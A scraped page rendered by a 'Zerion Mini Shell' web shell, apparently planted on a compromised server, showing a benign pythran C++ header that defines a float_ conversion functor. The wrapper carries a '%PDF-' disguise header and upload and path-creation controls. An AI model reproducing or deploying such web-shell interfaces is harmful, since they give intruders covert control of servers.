%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /proc/985914/root/lib/python3/dist-packages/pythran/pythonic/builtins/
Upload File :
Create Path :
Current File : //proc/985914/root/lib/python3/dist-packages/pythran/pythonic/builtins/float_.hpp

#ifndef PYTHONIC_BUILTIN_FLOAT_HPP
#define PYTHONIC_BUILTIN_FLOAT_HPP

#include "pythonic/include/builtins/float_.hpp"

#include "pythonic/utils/functor.hpp"

PYTHONIC_NS_BEGIN

namespace builtins
{

  namespace functor
  {
    template <class T>
    float_::type float_::operator()(T &&t) const
    {
      return static_cast<float_::type>(t);
    }

    float_::type float_::operator()() const
    {
      return 0.;
    }
  }
}
PYTHONIC_NS_END

#endif

Zerion Mini Shell 1.0